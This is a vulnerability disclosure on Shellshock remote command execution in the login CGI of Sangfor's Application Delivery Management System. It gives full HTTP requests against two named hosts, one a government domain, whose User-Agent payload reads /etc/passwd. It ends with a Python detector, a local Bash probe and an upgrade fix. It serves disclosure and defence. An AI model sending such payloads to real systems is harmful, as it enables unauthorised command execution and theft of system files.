Sangfor Application Delivery Management System Bash Remote Command Execution Vulnerability (no login required)
Multiple versions of the Sangfor Application Delivery Management System are affected by the Bash remote command execution vulnerability (the environment-variable function-import bug known as Shellshock, CVE-2014-6271). The bug is reachable through /cgi-bin/login.cgi before any login, because the CGI handler passes request headers such as User-Agent to Bash as environment variables.
Both version 4.5 and version 3.9 are affected.
Version 4.5

Request (the payload sits in the User-Agent header; the `() { :;};` prefix makes Bash parse the value as a function definition and execute the command that follows it):

https://cxxjs.com/cgi-bin/login.cgi?action=log&fro=self#
Host: cxxjs.com
User-Agent: () { :;}; echo `/bin/cat /etc/passwd`
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: adx_flag=1819988463
DNT: 1
Connection: keep-alive
Cache-Control: max-age=0

The command output (the contents of /etc/passwd) is displayed directly on the login page, or can be seen by clicking to view the version.
Version 3.9

Request (same payload in the User-Agent header):

https://xtds.gov.cn/cgi-bin/login.cgi?action=log&fro=self&rand=0.12944530067034066#
Host: xtds.gov.cn
User-Agent: () { :;}; echo `/bin/cat /etc/passwd`
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive

Click the product to view the version; the content shown is the contents of /etc/passwd.
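The following is an added example, not part of the original report and not Sangfor code. It models the mechanism the two requests above rely on: a CGI handler exports every request header as an HTTP_* environment variable, and an unpatched Bash executes whatever follows a `() { ... };` function body in such a variable. The script parses a raw request the way CGI/1.1 does, flags any header that would trigger Shellshock and extracts the injected command, and includes the standard local probe for checking whether a host's Bash is still vulnerable (useful after the "upgrade" fix). The sample requests are constructed for this example; only the User-Agent payload is taken from the report.

```python
import os
import re
import shutil
import subprocess
from typing import Dict, List, Optional, Tuple

# A value beginning with "() {" is what unpatched bash (CVE-2014-6271, "Shellshock")
# parses as an exported function definition; the text after the closing brace and
# semicolon is executed as a command as soon as the CGI handler starts bash.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)$")

# Constructed sample requests (not captured traffic). The first carries the
# User-Agent payload from the report; the second is an ordinary browser request.
SAMPLE_EXPLOIT = (
    "GET /cgi-bin/login.cgi?action=log&fro=self HTTP/1.1\r\n"
    "Host: cxxjs.com\r\n"
    "User-Agent: () { :;}; echo `/bin/cat /etc/passwd`\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Cookie: adx_flag=1819988463\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)
SAMPLE_BENIGN = (
    "GET /cgi-bin/login.cgi?action=log&fro=self HTTP/1.1\r\n"
    "Host: cxxjs.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0\r\n"
    "Accept-Language: zh-cn,zh;q=0.8\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request into {header-name: value}; the request line is skipped."""
    headers: Dict[str, str] = {}
    for line in raw.split("\r\n")[1:]:
        if not line:
            break  # blank line terminates the header block
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def cgi_env_from_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Apply the CGI/1.1 rule: header name -> 'HTTP_' + upper-case with '-' mapped to '_'."""
    return {"HTTP_" + name.upper().replace("-", "_"): value for name, value in headers.items()}


def scan_request(raw: str) -> List[Tuple[str, str]]:
    """Return (env-var-name, injected-command) for every header that would trigger Shellshock."""
    findings: List[Tuple[str, str]] = []
    for var, value in cgi_env_from_headers(parse_headers(raw)).items():
        match = SHELLSHOCK_RE.match(value)
        if match:
            findings.append((var, match.group("cmd").strip()))
    return findings


def local_bash_vulnerable(bash: str = "bash") -> Optional[bool]:
    """Run the standard Shellshock probe against a local bash binary.

    Returns True if the command smuggled in the environment variable executed,
    False on a patched bash, and None when no bash binary is available.
    """
    path = shutil.which(bash)
    if path is None:
        return None
    env = {"PATH": os.environ.get("PATH", "/bin:/usr/bin"),
           "x": "() { :;}; echo SHELLSHOCK_VULNERABLE"}
    try:
        result = subprocess.run([path, "-c", "echo probe"], env=env,
                                capture_output=True, text=True, timeout=5)
    except subprocess.TimeoutExpired:
        return None
    return "SHELLSHOCK_VULNERABLE" in result.stdout


if __name__ == "__main__":
    for label, request in (("exploit", SAMPLE_EXPLOIT), ("benign", SAMPLE_BENIGN)):
        print(label, scan_request(request))
    print("local bash vulnerable:", local_bash_vulnerable())
```

The detector scans every header, not only User-Agent, because any header the CGI layer exports (Cookie, Referer, Accept-Language, ...) is an equally good carrier; a patched Bash prints a warning about the ignored function definition to stderr and never runs the trailing command, which is what the local probe checks for.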
Solution:
Upgrade to a release whose Bash carries the Shellshock fix (or patch Bash on the appliance), then re-send the request above and confirm the header value is no longer executed.